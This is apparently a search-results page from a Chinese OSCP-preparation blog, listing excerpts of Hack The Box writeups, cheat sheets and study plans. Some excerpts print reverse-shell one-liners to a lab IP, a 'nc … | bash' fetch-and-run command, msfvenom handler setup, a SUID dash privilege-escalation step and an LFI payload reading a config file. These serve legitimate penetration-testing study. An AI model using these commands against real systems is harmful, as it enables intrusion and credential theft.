Sense Writeup

0x01 信息收集

0x02 漏洞利用






Advanced Media & Mechanics
找到 26 项
UNNAME
%s/{old}/{new}/g IFS={xx} TODO python -c 'import pty;pty.spawn("/bin/bash")' ctrl+z stty raw -echo;fg chmod 4755 /bin/dash dash cd /root/ // 还可以现写命令执行 int main(
MSFVENOM
use exploit/multi/handler set PAYLOAD <Payload name set RHOST <Remote IP set LHOST <Local IP set LPORT <Local Port run nc -lnvp <Local IP msfvenom -p linux/x86/
WINDOWS PRIV ESC
TODO
SWAGSHOP WRITEUP
nmap -A -p- -oA nmap/tcp 10.10.10.140 - 22: OpenSSH 7.2p1,版本较高 - 80: apache 2.4.18,版本较高,web 页面 title Home page nmap -A -p- -oA nmap/udp 10.10.10.140
FRIENDZONE WRITEUP
php://filter/covert.base64-encode/resource={papgename} 的操作为啥不能用?待了解。 nmap -A -p- -oA nmap/tcp 10.10.10.123 开放端口不少,可能是一个比较灵活的盒子。 - 21: vsftpd 3.0.3,版本较高 - 22: Op
CHANGELOG
记录一些关键更新。 我擦,咕了一年没脸看,主要还是懒得写,现在重启。 - 往后的解题报告过程会简化,以进攻路线为主。问就是靶场实在太多写不过来了,至少短期是这样。 - 技巧和笔记方面会多写。 简化 writeup 系列文章章节标题描述:漏洞枚举 - 枚举,Getshell - 立足点。 writeup 系列文章结构变更
IRKED WRITEUP
跑一下 LinEnum.sh 看下能不能跑出 /home/djmardov/.backup 文件。 nmap -d -p6697 --script=irc-unrealircd-backdoor.nse 10.10.10.117 扫到 unrealircd 后门。 实际上这里要开启后门只要 nc 命令过去就可以了。需要
VALENTINE WRITEUP
存在 SFTP 溢出 RCE,需要登录凭证,用户名,或者私钥。 当 ssh 仅允许 sftp 时,借助此漏洞可使用 ssh 来访问系统(执行命令)。 --script vuln 扫到 heartbleed 漏洞。 搜到一个 ASCII Hex,解码后是一个加密后的 idrsa,用 openssh 解密,报错。 open
LEARNING PLAN
1. Linux 熟练使用 应该用不着熟练吧。。。 练习常用命令:http://linuxcommand.org/ 游戏式练习:http://overthewire.org/wargames/ 2. 会一门编程语言 PYTHON YES! 有个课程先存一下,可能要收费:http://www.pentesteracade
RESOURCES
在考试准备的过程中发现的一些宝贵资料,也是日常工作中长期可用的参考。 http://www.0daysecurity.com/penetration-testing/enumeration.html https://nmap.org/nsedoc/ https://www.youtube.com/watch?v=Hk-
FILE TRANSFER
cat ${file}|nc -lnvp port nc ip port ${file} nc ip port | bash wget http://domain/file wget -r http://domain/dir curl http://domain/file -o file curl http://dom
SENSE WRITEUP
REVERSE SHELL
Tested on Ubuntu 10.10 /bin/bash -i & /dev/tcp/10.10.14.1/4444 0&1 常见版本 nc -e /bin/sh 10.10.14.1 4444 nc -e cmd.exe 10.10.14.1 4444 Netcat-openbsd 版不支持 -e,这时候用下
COMMON PROBLEMS
curl 需要加上 -k,wget 需要加上 --no-check-certificate curl -v -k https://amm907.com wget --no-check-certificate https://amm907.com OPENSSLCONF=./opensslallowtls1.0.cnf
NIBBLES WRITEUP
扫目录,打开得到版本号。 根据目录扫描结果去看一些文件。 下个开源的包,搜版本号,记住位置,在靶机上找这个位置,得到版本号。 http://10.10.10.75/nibbleblog/content/private/plugins/myimage/image.php
BEEP WRITEUP
玩法非常多。 0、lfi-password https://10.10.10.7/vtigercrm/graph.php?currentlanguage=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action google 找到 elas
TRAINING PLAN
1. 与 OSCP 实验室相似的系列靶场走一遍。 - Hack The Box - VulnHub 2. Pwk 课程。 3. OSCP 实验室 + 报告。 依照 @TJNull 总结的 HTB 中 与 OSCP 类似的靶场列表练习。 <iframe src="https://docs.google.com/sprea
LINUX PRIV ESC
收集 - 枚举,更多枚举和更多枚举。 处理 - 对收集的信息进行排序、分析和确定优先级。 搜索 - 知道要搜索什么以及在哪里可以找到漏洞利用代码。 定制 - 定制化 EXP,使其适合\可以使用。并非每个 EXP 对每个系统都是“开箱即用”的。 尝试 - 为(大量)反复试验做好准备。 信息收集、整理 - 找 EXP,修改
VERSION COMPARE
版本查询,日期查询等相关的信息收集操作。 Google 搜:name version changelog 比如,要找 pfsense 2.1.3 的发布日期,以便与补丁、exp 啥的比对,google 搜: pfsense 2.1.3 changelog 通过将 当前 OS 版本+当前端口服务 和 同版本 OS 发版时
BASHED WRITEUP
先手 nmap。 nmap -A -p- -oA nmap/tcp 10.10.10.68 就开了一个 80。 - 80: apache 2.4.18,可能是漏洞版本,开放了 web 页面。 nmap -sU -A -p- -oA nmap/udp 10.10.10.68 未见开放。 共开放了 tcp 80 端口。 浏
SHOCKER WRITEUP
就给一个 IP,不扫端口你还能咋地,nmap 走起来。 nmap -A -p- -oA nmap/tcp 10.10.10.56 发现两个开放端口。 - 80: apache 2.4.18,可能是漏洞版本,开放了 web 页面,title 无 - 2222: OpenSSH 7.2p2,操作系统为 ubuntu lin
NMAP TIPS
nmap 常用参数无非就那几个,但是在不同场景下,综合扫描速度和探测目标,用不同的参数组合应对。 在扫描参数中 -A == -sC -sV -O -traceroute,代表 脚本扫描、服务探测、系统探测、路由追踪。 - 左边:-sC -sV -O - 右边:-A 预期 -A 只会多出 1~2 个路由追踪的结果,有时候
AT THE BEGINNING
咳咳,难顶。 备考 OSCP 水远山长,以此记录一下过程和经验(没考到就谈不上经验),包括个人渗透系统的部署搭建,一些备考相关的提示,和可能会记录的一些杂七杂八。 在之后会主更一些系列 writeup。 1. 虽然在电脑上已做笔记,还是得有个地方详细记录一下解题过程。 2. 书写本身就是对知识点的加固和串联。 3. 为
LAME WRITEUP
Lame 比较简单,篇幅比较啰嗦,旨在: 1. 讲清楚步骤和思路。 2. 尽可能把可以利用的点走一遍,所以一处服务会有多种打法,虽然有的没成功ahahaha。 3. 算是一点总结提升。 上来第一件事先扫下开放端口,刚开始先用脚本把全端口跑一遍。 在目录下新建一个 nmap 文件夹用来放扫描结果,整个渗透过程中可能存在多
HTB ENVIRONMENT
。。。 启动 openvpm amm907.ovpn 看到 Initialization Sequence Completed 字样说明连接成功。 然后查看本地 IP ip a 可以看到新增的 tun0 内网地址 10.10.14.11,即是实验室环境 ip。 常见异常 openvpn 断开后留下 tun0 接口,再次
KALI DEPLOY
自然是选择 KALI 作为工具系统,初始化的配置较为繁琐,这里例举一下常用的配置,最后整理个(尽量)一键脚本。 vi /etc/network/interfaces auto eth0 iface eth0 inet dhcp /etc/init.d/networking restart && ip a apt-key